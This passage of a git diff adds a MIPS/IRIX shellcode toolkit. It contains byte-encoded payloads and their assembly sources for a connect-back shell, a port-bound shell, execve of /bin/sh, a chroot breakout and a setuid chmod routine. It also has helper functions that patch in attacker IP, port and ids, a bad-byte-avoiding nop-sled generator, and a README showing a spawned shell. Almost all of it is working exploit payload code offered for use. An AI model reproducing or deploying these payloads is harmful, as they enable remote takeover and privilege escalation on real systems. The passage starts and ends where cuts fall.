118 for (walk = 0 ; dest_len > 0 ; dest_len -= 4 , walk += 4) {
119 /* avoid endless loops on excessive badlisting */
120 for (bcount = 0 ; bcount < 16384 ; ++bcount) {
121 xs = xferstr[random_get (0, 17)];
122 tgt = mips_nop_xfer (xs);
123
124 dest[walk + 0] = (tgt >> 24) & 0xff;
125 dest[walk + 1] = (tgt >> 16) & 0xff;
126 dest[walk + 2] = (tgt >> 8) & 0xff;
127 dest[walk + 3] = tgt & 0xff;
128 if (badstr (&dest[walk], 4, bad, bad_len) == 0)
129 break;
130 }
131
132 /* should not happen */
133 if (bcount >= 16384) {
134 fprintf (stderr, "too much blacklisting, giving up...\n");
135 exit (EXIT_FAILURE);
136 }
137 }
138
139 return (walk);
140}
141
142
143
diff --git a/other/shellkit/mips.h b/other/shellkit/mips.h
new file mode 100644
index 0000000..98f8999
--- /dev/null
+++ b/other/shellkit/mips.h
@@ -0,0 +1,19 @@
1
2#ifndef MIPS_H
3#define MIPS_H
4
5/* mips_nop
6 *
7 * create `dest_len' bytes of nopspace at `dest', which does not contain any
8 * of the bytes in `bad', which is a char array, `bad_len' in size
9 *
10 * return number of bytes generated
11 */
12
13unsigned int
14mips_nop (unsigned char *dest, unsigned int dest_len,
15 unsigned char *bad, int bad_len);
16
17#endif
18
19
diff --git a/other/shellkit/mips.o b/other/shellkit/mips.o
new file mode 100644
index 0000000..7f753ca
--- /dev/null
+++ b/other/shellkit/mips.o
Binary files differ
diff --git a/other/shellkit/mips_irix.c b/other/shellkit/mips_irix.c
new file mode 100644
index 0000000..33bf38c
--- /dev/null
+++ b/other/shellkit/mips_irix.c
@@ -0,0 +1,231 @@
1
2#include <stdio.h>
3#include <stdlib.h>
4#include <string.h>
5#include "shellcode.h"
6#include "mips.h"
7
8
9/* tested on: IP20 R4000 6.5
10 */
11shellcode mips_irix_chmod = {
12 "mips-irix-chmod",
13 64,
14 "\x04\x10\xff\xff\x24\x05\x41\x41\x38\xa5\x55\x55"
15 /* ^^ ^^ = uid ^ 0x5555 */
16 "\x24\x06\x42\x42\x38\xc6\x05\x55\x27\xe4\x01\x80"
17 /* ^^ ^^ = gid ^ 0x5555 */
18 "\xa0\x80\x00\x00\x24\x84\xfe\xb8\x24\x02\x03\xf8"
19 /* ^^ ^^ = length of appended pathname + 0xfeb8 */
20 "\x01\x01\x01\x0c\x24\x05\x09\xed\x24\x02\x03\xf7"
21 "\x01\x01\x01\x0c\x24\x02\x03\xe9\x01\x01\x01\x0c"
22 "\x24\x18\x72\xec",
23};
24
25/* tested on: IP20 R4000 6.5
26 */
27shellcode mips_irix_chroot = {
28 "mips-irix-chroot",
29 84,
30 "\x04\x10\xff\xff\x24\x05\x01\xc0\x3c\x0e\x59\x2e"
31 "\x35\xce\x2c\xff\x21\xce\x01\x01\xaf\xee\xff\xd0"
32 "\x27\xe4\xff\xd0\x24\x02\x04\x38\x01\x01\x01\x0c"
33 "\x24\xa2\x02\x65\x01\x01\x01\x0c\x24\x12\x12\x11"
34 "\x27\xe4\xff\xd1\x24\x02\x03\xf4\x01\x01\x01\x0c"
35 "\x22\x52\xfe\xff\x06\x41\xff\xfb\x26\x42\x04\x26"
36 "\x27\xe4\xff\xd2\x01\x01\x01\x0c\x24\x0e\x73\x50",
37};
38
39/* tested on: IP20 R4000 6.5
40 */
41shellcode mips_irix_connectsh = {
42 "mips-irix-connectsh",
43 172,
44 "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
45 "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
46 "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
47 "\x24\x0e\x41\x41\xa7\xae\xff\xf2\x3c\x0e\x41\x42"
48 /* ^^ ^^ port */ /* ^^ ^^ ip 1.2. */
49 "\x35\xce\x43\x44\xaf\xae\xff\xf4\xaf\xa0\xff\xf8"
50 /* ^^ ^^ ip .3.4 */
51 "\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0\x03\xa6\x28\x23"
52 "\x24\x02\x04\x43\x01\x01\x01\x0c\x26\xd3\xbc\xe2"
53 "\x30\x97\xff\xff\x32\x64\x01\x03\x24\x02\x03\xee"
54 "\x01\x01\x01\x0c\x32\xe4\xff\xff\x28\x05\xff\xff"
55 "\x32\x66\x01\x03\x24\x02\x04\x26\x01\x01\x01\x0c"
56 "\x26\x73\xef\xef\x06\x61\xff\xf6\xaf\xa0\xff\xfc"
57 "\x04\x10\xff\xff\x27\xa5\xff\xf8\x27\xff\x01\x20"
58 "\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff\xaf\xa4\xff\xf8"
59 "\x24\x02\x04\x23\x01\x01\x01\x0c"
60 "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
61};
62
63/* tested on: IP20 R4000 6.5
64 */
65shellcode mips_irix_execvesh = {
66 "mips-irix-execvesh",
67 48,
68 "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x8f\xa6\xff\xfc"
69 "\x27\xff\x01\x24\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
70 "\xaf\xa4\xff\xf8\x27\xa5\xff\xf8\x24\x02\x04\x23"
71 "\x01\x01\x01\x0c"
72 "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
73};
74
75shellcode mips_irix_exit = {
76 "mips-irix-exit",
77 16,
78 "\x28\x04\xff\xff\x24\x02\x03\xe9\x01\x01\x01\x0c"
79 "\x24\x18\x73\x50",
80};
81
82/* tested on: IP20 R4000 6.5
83 * IP30 R10000 6.5.7m (thanks oxigen ;)
84 */
85shellcode mips_irix_portshellsh = {
86 "mips-irix-portshellsh",
87 188, /* yay! well optimized */
88 "\x24\x16\x73\x50\x26\xc4\x8c\xb2\x26\xc5\x8c\xb2"
89 "\x26\xc6\x8c\xb6\x24\x02\x04\x53\x01\x01\x01\x0c"
90 "\x30\x44\xff\xff\x26\xce\x8c\xb2\xa7\xae\xff\xf0"
91 "\x24\x0e\x41\x41\xa7\xae\xff\xf2\xaf\xa0\xff\xf4" /* 0x4141 = port */
92 "\xaf\xa0\xff\xf8\xaf\xa0\xff\xfc\x26\xc6\x8c\xc0"
93 "\x03\xa6\x28\x23\x24\x02\x04\x42\x01\x01\x01\x0c"
94 "\x24\x02\x04\x48\x01\x01\x01\x0c\xaf\xa6\xff\xec"
95 "\x27\xa6\xff\xec\x24\x02\x04\x41\x01\x01\x01\x0c"
96 "\x26\xd3\xbc\xe2\x30\x57\xff\xff\x32\x64\x01\x03"
97 "\x24\x02\x03\xee\x01\x01\x01\x0c\x32\xe4\xff\xff"
98 "\x28\x05\xff\xff\x32\x66\x01\x03\x24\x02\x04\x26"
99 "\x01\x01\x01\x0c\x26\x73\xef\xef\x06\x61\xff\xf6"
100 "\xaf\xa0\xff\xfc\x04\x10\xff\xff\x27\xa5\xff\xf8"
101 "\x27\xff\x01\x20\x23\xe4\xfe\xf8\xa3\xe0\xfe\xff"
102 "\xaf\xa4\xff\xf8\x24\x02\x04\x23\x01\x01\x01\x0c"
103 "\x2f\x62\x69\x6e\x2f\x73\x68\x42", /* "/bin/sh\x42" */
104};
105
106/* tested on: IP20 R4000 6.5
107 */
108shellcode mips_irix_read = {
109 "mips-irix-read",
110 56,
111 "\x04\x10\xff\xff\x28\x04\xff\xff\x27\xff\x01\x31"
112 "\x27\xe5\xfe\xff\x24\x06\x10\x10\x24\x02\x03\xeb"
113 "\x01\x01\x01\x0c\x27\xe4\xfe\xff\x24\x05\x10\x10"
114 "\x24\x0e\xff\xfc\x01\xc0\x30\x27\x24\x02\x04\x7f"
115 "\x01\x01\x01\x0c\x24\x18\x73\x50",
116};
117
118shellcode mips_irix_setgid = {
119 "mips-irix-setgid",
120 16,
121 "\x24\x04\x41\x41\x38\x84\x55\x55\x24\x02\x04\x16" /* 0x4141 = gid ^ 0x5555 */
122 "\x01\x01\x01\x0c",
123};
124
125shellcode mips_irix_setreuid = {
126 "mips-irix-setreuid",
127 24,
128 "\x24\x04\x41\x41\x24\x05\x42\x42\x38\x84\x55\x55"
129 /* ^^^^^^ ruid ^^^^^^ euid, both xor 0x5555 */
130 "\x38\xa5\x55\x55\x24\x02\x04\x64\x01\x01\x01\x0c",
131};
132
133
134shellcode * mips_irix_shellcodes[] = {
135 &mips_irix_chmod,
136 &mips_irix_chroot,
137 &mips_irix_connectsh,
138 &mips_irix_execvesh,
139 &mips_irix_exit,
140 &mips_irix_portshellsh,
141 &mips_irix_read,
142 &mips_irix_setgid,
143 &mips_irix_setreuid,
144 NULL,
145};
146
147
148arch mips_irix = {
149 "mips-irix",
150 4,
151 mips_nop,
152 mips_irix_shellcodes,
153};
154
155
156
157/* set the uid, gid and pathname of the mips-irix-chmod code at `code'
158 * XXX: be sure to have strlen(pathname) bytes left after code
159 */
160void
161mips_irix_chmod_setup (unsigned char *code, char *pathname,
162 unsigned short int uid, unsigned short int gid)
163{
164 unsigned short int len = 0xfeb8;
165
166 uid ^= 0x5555;
167 code[6] = (uid >> 8) & 0xff;
168 code[7] = uid & 0xff;
169
170 gid ^= 0x5555;
171 code[14] = (gid >> 8) & 0xff;
172 code[15] = gid & 0xff;
173
174 len += strlen (pathname);
175 code[26] = (len >> 8) & 0xff;
176 code[27] = len & 0xff;
177
178 memcpy (code + 64, pathname, strlen (pathname));
179
180 return;
181}
182
183
184/* ip and port in network byte order
185 */
186void
187mips_irix_connectsh_setup (unsigned char *code,
188 unsigned long int ip, unsigned short int port)
189{
190 code[38] = (port >> 8) & 0xff;
191 code[39] = port & 0xff;
192
193 code[46] = (ip >> 24) & 0xff;
194 code[47] = (ip >> 16) & 0xff;
195 code[50] = (ip >> 8) & 0xff;
196 code[51] = ip & 0xff;
197
198 return;
199}
200
201
202/* set the gid within the 'mips-irix-setgid' code at `code'
203 */
204void
205mips_irix_setgid_setup (unsigned char *code, unsigned short int gid)
206{
207 gid ^= 0x5555;
208
209 code[2] = (gid >> 8) & 0xff;
210 code[3] = gid & 0xff;
211
212 return;
213}
214
215
216void
217mips_irix_setreuid_setup (unsigned char *code,
218 unsigned short int ruid, unsigned short int euid)
219{
220 ruid ^= 0x5555;
221 code[2] = (ruid >> 8) & 0xff;
222 code[3] = ruid & 0xff;
223
224 euid ^= 0x5555;
225 code[6] = (euid >> 8) & 0xff;
226 code[7] = euid & 0xff;
227
228 return;
229}
230
231
diff --git a/other/shellkit/mips_irix.h b/other/shellkit/mips_irix.h
new file mode 100644
index 0000000..68c633a
--- /dev/null
+++ b/other/shellkit/mips_irix.h
@@ -0,0 +1,17 @@
1
2#ifndef MIPS_IRIX_H
3#define MIPS_IRIX_H
4
5#include "shellcode.h"
6
7arch mips_irix;
8
9void
10mips_irix_setgid_setup (unsigned char *code, unsigned short int gid);
11
12void
13mips_irix_setreuid_setup (unsigned char *code,
14 unsigned short int ruid, unsigned short int euid);
15
16#endif
17
diff --git a/other/shellkit/mips_irix.o b/other/shellkit/mips_irix.o
new file mode 100644
index 0000000..b5313da
--- /dev/null
+++ b/other/shellkit/mips_irix.o
Binary files differ
diff --git a/other/shellkit/mips_irix/Makefile b/other/shellkit/mips_irix/Makefile
new file mode 100644
index 0000000..a68d231
--- /dev/null
+++ b/other/shellkit/mips_irix/Makefile
@@ -0,0 +1,22 @@
1
2#DFLAGS=-O2
3DFLAGS=-g -ggdb
4CC=gcc
5CFLAGS=$(DFLAGS) -Wall -DIRIX
6
7all:
8 $(CC) $(CFLAGS) -o chmod ../codedump.c chmod.s
9 $(CC) $(CFLAGS) -o chroot ../codedump.c chroot.s
10 $(CC) $(CFLAGS) -o connectsh ../codedump.c connectsh.s
11 $(CC) $(CFLAGS) -o execvesh ../codedump.c execvesh.s
12 $(CC) $(CFLAGS) -o exit ../codedump.c exit.s
13 $(CC) $(CFLAGS) -o portshellsh ../codedump.c portshellsh.s
14 $(CC) $(CFLAGS) -o read ../codedump.c read.s
15 $(CC) $(CFLAGS) -o setgid ../codedump.c setgid.s
16 $(CC) $(CFLAGS) -o setreuid ../codedump.c setreuid.s
17
18clean:
19 rm -f code.h codetest \
20 chmod chroot connectsh execvesh exit portshellsh read \
21 setgid setreuid
22
diff --git a/other/shellkit/mips_irix/README b/other/shellkit/mips_irix/README
new file mode 100644
index 0000000..a78c668
--- /dev/null
+++ b/other/shellkit/mips_irix/README
@@ -0,0 +1,25 @@
1
2mips/irix shellcodes
3some comments in this file
4
5
6for execvesh and portshellsh append "/bin/sh\x42" to the code.
7
8if you want to execute something different than "/bin/sh", be sure to properly
9set the first four bytes to a valid opcode ("/bin" is valid) or insert a nop
10and adjust the self-relocation.
11
12the codedump utility build extra cache control syscalls, so it flushes all
13caches properly and you can run the code safily then from a flushed cache.
14
15example:
16
17scut@hyperion $ make >/dev/null
18scut@hyperion $ ./execvesh
19 <... dumps the hexcode ...>
20scut@hyperion $ ./execvesh exec
21len = 68
22$
23$ exit
24scut@hyperion $
25
diff --git a/other/shellkit/mips_irix/chmod.s b/other/shellkit/mips_irix/chmod.s
new file mode 100644
index 0000000..181c123
--- /dev/null
+++ b/other/shellkit/mips_irix/chmod.s
@@ -0,0 +1,49 @@
1/* MIPS/IRIX PIC chmod code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17 /* FIXME: its not workable atm */
18cbegin:
19 .set noreorder
20 .set nomacro
21
22lbl: bltzal zero, lbl
23
24 li a1, 0x4141 /* a1 = uid ^ 0x5555 */
25 xor a1, a1, 0x5555
26 li a2, 0x4242 /* a2 = gid ^ 0x5555 */
27 xor a2, a2, 0x555
28
29 addu a0, ra, 0x0180
30 sb zero, -(0x0148 + -(9))(a0)
31 subu a0, a0, 0x0148
32
33 /* chown (a0 = pathname, a1 = uid, a2 = gid) */
34 li v0, SYS_chown /* 0x03f8 */
35 syscall
36
37 /* chmod (a0 = pathname, a1 = 04755) */
38 li a1, 0x09ed /* a1 = 04755 = 0x09ed */
39 li v0, SYS_chmod /* 0x03f7 */
40 syscall
41
42 li v0, SYS_exit /* 0x03e9 */
43 syscall
44 li t8, 0x72ec /* sane ds */
45
46 .end cbegin
47cend:
48
49 /* XXX: append pathname here, will get NUL terminated */
diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s
new file mode 100644
index 0000000..96a1595
--- /dev/null
+++ b/other/shellkit/mips_irix/chroot.s
@@ -0,0 +1,60 @@
1/* MIPS/IRIX PIC chroot break
2 * without 0x00, 0x0a, 0x0d, 0x25
3 *
4 * -sc.
5 */
6
7#include <sgidefs.h>
8#include <sys/regdef.h>
9#include <sys/asm.h>
10#include <sys.s>
11#include <sys/syscall.h>
12
13 .section .text
14
15 .globl cbegin
16 .globl cend
17
18cbegin:
19 .set noreorder
20 .set nomacro
21
22foo: bltzal zero, foo
23 li a1, 0700 /* a1 = 0700 permission */
24
25 /* mkdir ("Y..", 0700);
26 */
27 lui t2, 0x592e
28 ori t2, 0x2cff /* t1 = "Y..\x00" */
29 add t2, t2, 0x0101
30 sw t2, -48(ra)
31
32 subu a0, ra, 48 /* a0 = "Y.." */
33 li v0, SYS_mkdir /* 0x0438 */
34 syscall
35
36 /* chroot ("Y..");
37 * a0 still points to it
38 */
39 addu v0, a1, (SYS_chroot - 0700) /* v0 = SYS_chroot (0x0425) */
40 syscall
41
42 /* chdir ("..") a few times
43 */
44 li s2, 0x1211 /* 12 times chdir ("..") */
45
46foo2: subu a0, ra, 47 /* "..\x00" */
47 li v0, SYS_chdir /* 0x03f4 */
48 syscall
49 sub s2, 0x0101
50 bgez s2, foo2
51
52 addu v0, s2, 0x0426 /* bds: SYS_chroot (0x0425) + 1 */
53 subu a0, ra, 46 /* ".\x00" */
54 syscall
55 li t2, 0x7350 /* NOP */
56
57 .end cbegin
58cend:
59 nop
60
diff --git a/other/shellkit/mips_irix/connectsh.s b/other/shellkit/mips_irix/connectsh.s
new file mode 100644
index 0000000..7b77d4e
--- /dev/null
+++ b/other/shellkit/mips_irix/connectsh.s
@@ -0,0 +1,109 @@
1/* MIPS/IRIX PIC connect shell shellcode
2 * no 0x00, 0x0a, 0x0d, 0x25 bytes
3 *
4 * -sc
5 */
6
7 /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
8
9#include <sgidefs.h>
10#include <sys/regdef.h>
11#include <sys/asm.h>
12#include <sys.s>
13#include <sys/syscall.h>
14#include <elf.h>
15
16 .section .text
17
18 .globl cbegin
19 .globl cend
20
21cbegin:
22 .set noreorder
23 .set nomacro
24
25 /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
26 */
27 li s6, 0x7350
28 subu a0, s6, 0x734e /* AF_INET = 2 */
29 subu a1, s6, 0x734e /* SOCK_STREAM = 2 */
30 subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */
31 li v0, SYS_socket /* 0x0453 */
32 syscall
33
34 /* socket returned in v0, save to a0
35 */
36 andi a0, v0, 0xffff /* a0 = socket */
37
38 /* build struct sockaddr_in
39 * 0x0002port 0x_IP-addr_ 0x00000000 0x00000000
40 */
41 subu t2, s6, 0x734e /* t2 = 0x0002 */
42 sh t2, -16(sp)
43 li t2, 0x4141 /* t2 = port number */
44 sh t2, -14(sp)
45
46 /* ip address */
47 lui t2, 0x4142
48 ori t2, t2, 0x4344
49 sw t2, -12(sp)
50
51 sw zero, -8(sp)
52 sw zero, -4(sp)
53
54 /* connect (socket, (struct sockaddr *) cs,
55 * sizeof (struct sockaddr_in)
56 */
57 subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */
58 subu a1, sp, a2 /* a1 = (struct sockaddr *) */
59 li v0, SYS_connect /* 0x0443 */
60 syscall
61
62 /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
63 */
64 subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
65
66 /* socket returned in v0, save in s7
67 */
68 andi s7, a0, 0xffff
69
70 /* dup is emulated through close and fcntl, since irix offers no
71 * native dup syscall as for example linux. see phrack 56 for details
72 */
73dup_loop:
74 andi a0, s3, 0x0103 /* a0 = STD*_FILENO */
75 li v0, SYS_close /* 0x03ee */
76 syscall
77
78 andi a0, s7, 0xffff /* a0 = socket */
79 slti a1, zero, -1 /* a1 = 0 */
80 andi a2, s3, 0x0103 /* a2 = STD*_FILENO */
81 li v0, SYS_fcntl /* 0x0426 */
82 syscall
83
84 subu s3, 0x1011
85 bgez s3, dup_loop
86
87 /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
88 */
89 sw zero, -4(sp)
90
91 /* a2 (envp) is already zero due to the dup_loop
92 */
93gaddr: bltzal zero, gaddr /* rock on-. lsd */
94 subu a1, sp, 8
95
96 /* ra contains the proper address now */
97 addu ra, ra, 0x0120 /* add 32 + 0x0100 */
98
99 add a0, ra, -(8 + 0x100)
100 sb zero, -(1 + 0x100)(ra) /* store NUL */
101 sw a0, -8(sp)
102 li v0, SYS_execve
103 syscall
104
105 .end cbegin
106cend:
107
108 /* XXX append here: "/bin/sh\x42" */
109
diff --git a/other/shellkit/mips_irix/execvesh.s b/other/shellkit/mips_irix/execvesh.s
new file mode 100644
index 0000000..89fd45b
--- /dev/null
+++ b/other/shellkit/mips_irix/execvesh.s
@@ -0,0 +1,36 @@
1/* MIPS/IRIX PIC execve code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17cbegin:
18 .set noreorder
19 .set nomacro
20
21 sw zero, -4(sp)
22foo: bltzal zero, foo
23 lw a2, -4(sp)
24
25 addu ra, ra, 0x0124 /* add 36 + 0x0100 */
26
27 add a0, ra, -(8 + 0x100)
28 sb zero, -(1 + 0x100)(ra)
29 sw a0, -8(sp)
30 subu a1, sp, 8
31 li v0, SYS_execve
32 syscall
33
34 .end cbegin
35cend:
36
diff --git a/other/shellkit/mips_irix/exit.s b/other/shellkit/mips_irix/exit.s
new file mode 100644
index 0000000..aef7d01
--- /dev/null
+++ b/other/shellkit/mips_irix/exit.s
@@ -0,0 +1,29 @@
1/* MIPS/IRIX PIC exit code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17cbegin:
18 .set noreorder
19 .set nomacro
20
21 /* _exit (0) */
22 slti a0, zero, -1
23 li v0, SYS_exit /* 0x03e9 */
24 syscall
25 li t8, 0x7350
26
27 .end cbegin
28cend:
29
diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s
new file mode 100644
index 0000000..18070f6
--- /dev/null
+++ b/other/shellkit/mips_irix/portshellsh.s
@@ -0,0 +1,126 @@
1/* MIPS/IRIX PIC listening port shellcode
2 * no 0x00, 0x0a, 0x0d, 0x25 bytes
3 *
4 * bind a shell to tcp port 0x4141
5 *
6 * 2001/05/25 optimized from 368 down to 188 bytes -sc.
7 *
8 */
9
10 /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
11
12#include <sgidefs.h>
13#include <sys/regdef.h>
14#include <sys/asm.h>
15#include <sys.s>
16#include <sys/syscall.h>
17#include <elf.h>
18
19 .section .text
20
21 .globl cbegin
22 .globl cend
23
24cbegin:
25 .set noreorder
26 .set nomacro
27
28 /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
29 */
30 li s6, 0x7350
31 subu a0, s6, 0x734e /* AF_INET = 2 */
32 subu a1, s6, 0x734e /* SOCK_STREAM = 2 */
33 subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */
34 li v0, SYS_socket /* 0x0453 */
35 syscall
36
37 /* socket returned in v0, save to a0
38 */
39 andi a0, v0, 0xffff /* a0 = socket */
40
41 /* build struct sockaddr_in
42 * 0x0002port 0x00000000 0x00000000 0x00000000
43 */
44 subu t2, s6, 0x734e /* t2 = 0x0002 */
45 sh t2, -16(sp)
46 li t2, 0x4141 /* t2 = port number */
47 sh t2, -14(sp)
48 sw zero, -12(sp)
49 sw zero, -8(sp)
50 sw zero, -4(sp)
51
52 /* bind (socket, (struct sockaddr *) srv_addr,
53 * sizeof (struct sockaddr_in)
54 */
55 subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */
56 subu a1, sp, a2 /* a1 = (struct sockaddr *) */
57 li v0, SYS_bind /* 0x0442 */
58 syscall
59
60 /* listen (socket, backlog)
61 * XXX: is it safe here to make backlog = pointer-on-the-stack ?
62 * should be, since its still a positive number
63 */
64/* subu a1, s6, 0x7340 *//* a1 = backlog = 0x10 */
65 li v0, SYS_listen /* 0x0448 */
66 syscall
67
68 /* accept (socket, (struct sockaddr *) cl_addr,
69 * &socklen)
70 * XXX: a1 is still the pointer to the sockaddr struct
71 * a2 should be 0x10 still
72 */
73 sw a2, -20(sp)
74 subu a2, sp, 20 /* a2 = &socklen */
75 li v0, SYS_accept /* 0x0441 */
76 syscall
77
78
79 /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
80 */
81 subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
82
83 /* socket returned in v0, save in s7
84 */
85 andi s7, v0, 0xffff
86
87 /* dup is emulated through close and fcntl, since irix offers no
88 * native dup syscall as for example linux. see phrack 56 for details
89 */
90dup_loop:
91 andi a0, s3, 0x0103 /* a0 = STD*_FILENO */
92 li v0, SYS_close /* 0x03ee */
93 syscall
94
95 andi a0, s7, 0xffff /* a0 = socket */
96 slti a1, zero, -1 /* a1 = 0 */
97 andi a2, s3, 0x0103 /* a2 = STD*_FILENO */
98 li v0, SYS_fcntl /* 0x0426 */
99 syscall
100
101 subu s3, 0x1011
102 bgez s3, dup_loop
103
104 /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
105 */
106 sw zero, -4(sp)
107
108 /* a2 (envp) is already zero due to the dup_loop
109 */
110gaddr: bltzal zero, gaddr /* rock on-. lsd */
111 subu a1, sp, 8
112
113 /* ra contains the proper address now */
114 addu ra, ra, 0x0120 /* add 32 + 0x0100 */
115
116 add a0, ra, -(8 + 0x100)
117 sb zero, -(1 + 0x100)(ra) /* store NUL */
118 sw a0, -8(sp)
119 li v0, SYS_execve
120 syscall
121
122 .end cbegin
123cend:
124
125 /* XXX append here: "/bin/sh\x42" */
126
diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s
new file mode 100644
index 0000000..90ab25d
--- /dev/null
+++ b/other/shellkit/mips_irix/read.s
@@ -0,0 +1,51 @@
1/* MIPS/IRIX PIC read/cacheflush code
2 *
3 * -sc.
4 *
5 * some note:
6 * since the data that is read in is treated in the data cache, you may
7 * experience a data/instruction cache incoherence, where the instruction
8 * cache still contains the old memory contents. to avoid this, send a lot
9 * of data, first the shellcode and then a huge bogus space of nops, which
10 * are to flush the data cache, later making the instruction cache populated
11 * with the real shellcode. or do it as we do it here, use a cacheflush
12 * syscall. this is only possible if this code is already in icache, so for
13 * the usual exploitation situation that does not help much.
14 */
15
16#include <sgidefs.h>
17#include <sys/regdef.h>
18#include <sys/asm.h>
19#include <sys.s>
20#include <sys/syscall.h>
21
22 .section .text
23
24 .globl cbegin
25 .globl cend
26
27cbegin:
28 .set noreorder
29 .set nomacro
30
31foo: bltzal zero, foo
32 slti a0, zero, -1
33
34 addu ra, ra, (0x0101 + 48)
35 subu a1, ra, 0x0101
36
37 li a2, 0x1010 /* read 0x1010 bytes max */
38 li v0, SYS_read
39 syscall
40
41 subu a0, ra, 0x0101 /* data was read to here */
42 li a1, 0x1010 /* should be cacheline aligned */
43 li t2, -4
44 not a2, t2 /* BCACHE = 0x03 */
45 li v0, SYS_cachectl /* 0x047e */
46 syscall
47 li t8, 0x7350 /* has to be a sane bds */
48
49 .end cbegin
50cend:
51
diff --git a/other/shellkit/mips_irix/setgid.s b/other/shellkit/mips_irix/setgid.s
new file mode 100644
index 0000000..3223892
--- /dev/null
+++ b/other/shellkit/mips_irix/setgid.s
@@ -0,0 +1,30 @@
1/* MIPS/IRIX PIC setgid chainable code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17cbegin:
18 .set noreorder
19 .set nomacro
20
21 /* setgid (a0) */
22 li a0, 0x4141 /* gid ^ 0x5555 */
23 xor a0, a0, 0x5555
24 li v0, SYS_setgid /* 0x0416 */
25 syscall
26 li t8, 0x7350
27
28 .end cbegin
29cend:
30
diff --git a/other/shellkit/mips_irix/setreuid.s b/other/shellkit/mips_irix/setreuid.s
new file mode 100644
index 0000000..9578262
--- /dev/null
+++ b/other/shellkit/mips_irix/setreuid.s
@@ -0,0 +1,32 @@
1/* MIPS/IRIX PIC setreuid chainable code
2 *
3 * -sc.
4 */
5
6#include <sgidefs.h>
7#include <sys/regdef.h>
8#include <sys/asm.h>
9#include <sys.s>
10#include <sys/syscall.h>
11
12 .section .text
13
14 .globl cbegin
15 .globl cend
16
17cbegin:
18 .set noreorder
19 .set nomacro
20
21 /* setreuid (a0, a1) */
22 li a0, 0x4141 /* ruid ^ 0x5555 */
23 li a1, 0x4242 /* euid ^ 0x5555 */
24 xor a0, a0, 0x5555
25 xor a1, a1, 0x5555
26 li v0, SYS_setreuid /* 0x0464 */
27 syscall
28 li t8, 0x7350
29
30 .end cbegin
31cend:
32
diff --git a/other/shellkit/shellcode.c b/other/shellkit/shellcode.c
new file mode 100644
index 0000000..330fe2e
--- /dev/null
+++ b/other/shellkit/shellcode.c
@@ -0,0 +1,61 @@
1
2/* TODO: better randomness
3 */
4
5#include <sys/types.h>
6#include <time.h>
7#include <stdio.h>
8#include <stdlib.h>
9#include "shellcode.h"
10
11
12unsigned long int
13random_get (unsigned long int low, unsigned long int high)
14{
15 unsigned long int val;
16
17 if (low > high) {
18 low ^= high;
19 high ^= low;
20 low ^= high;
21 }
22
23 val = (unsigned long int) random ();
24 val %= (high - low);
25 val += low;
26
27 return (val);
28}
29
30
31void
32random_init (void)
33{
34 srandom (time (NULL));
35}
36
37
38int
39bad (unsigned char u)
40{
41 if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
42 return (1);
43
44 return (0);
45}
46
47int
48badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len)
49{
50 int n;
51
52 for (code_len -= 1 ; code_len >= 0 ; --code_len) {
53 for (n = 0 ; n < bad_len ; ++n)
54 if (code[code_len] == bad[n])
55 return (1);
56 }
57
58 return (0);
59}
60
61
diff --git a/other/shellkit/shellcode.h b/other/shellkit/shellcode.h
new file mode 100644
index 0000000..02e090c
--- /dev/null
+++ b/other/shellkit/shellcode.h
@@ -0,0 +1,62 @@
1
2/* shellcode.h - shellcode structure and function definitions
3 *
4 * team teso
5 */
6
7#ifndef SHELLCODE_H
8#define SHELLCODE_H
9
10
11/* (nop_gen) function type which will generate a nop space:
12 * parameters: unsigned char *dest, unsigned int dest_len
13 *
14 * will generate no more than dest_len bytes of nop space. the length
15 * is rounded down to a multiple of arch_codelen, so for risc archs be
16 * sure dest_len % arch_codelen is zero
17 *
18 * return the number of nop bytes generated (not the instruction count)
19 *
20 * XXX: name your functions <arch>_nop
21 */
22typedef unsigned int (* nop_gen)(unsigned char *, unsigned int,
